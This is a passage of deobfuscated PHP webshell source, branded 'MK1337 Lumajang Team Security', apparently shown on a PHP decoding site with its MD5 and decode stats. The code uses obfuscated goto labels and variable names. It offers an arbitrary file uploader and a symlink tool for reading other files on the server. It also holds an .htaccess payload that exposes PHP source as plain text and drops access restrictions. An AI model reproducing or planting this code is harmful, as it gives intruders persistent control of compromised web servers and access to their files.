</form>\xa"; $IIIIIIII1lIl = $_POST["file"]; $symfile = $_POST["symfile"]; $symlink = $_POST["symlink"]; if ($symlink) { @symlink("{$IIIIIIII1lIl}", "mk1337/{$symfile}"); echo "<br /><a target="_blank" href="mk1337/" . $symfile . "" >" . $symfile . "</a>"; } break; default: header("Location: {$IIIIIIIIIlIl}"); } } else { echo "<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; if ($_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<br /><br /><b>Uploaded successful !!<br><br>"; } else { echo "<br /><br />Not uploaded !!<br><br>"; } } echo "
<br /><br /><div class="fot">MK1337\xa<br /><br />\xaLumajang Team Security</div> "; } goto MZJi1; vUFCA: @ini_set("output_buffering", 0); goto B2wXQ; MZJi1: echo "
</div>
</div>
</body>
<audio autoplay="true" src="https://f.top4top.io/m_20526cnoz1.mp3" type="audio/mpeg"></audio>
</html>\xa"; goto I18fF; sQHVb: $IIIIIIIIIIl1 = "Options all
DirectoryIndex Sux.html \xa AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html \xa AddHandler txt .html \xa Require None
Satisfy Any"; goto xypHg; pE0Ld: ${"GLOBALS"}["wjvndmeekidul_yfxatwqiioe_gljf_"] = "_SERVER"; goto NIafz; OV4d_: ?>
Function Calls
None |
Stats
MD5 | e866cf0dd9215602d428f91f98fc5b33 |
Eval Count | 0 |
Decode Time | 72 ms |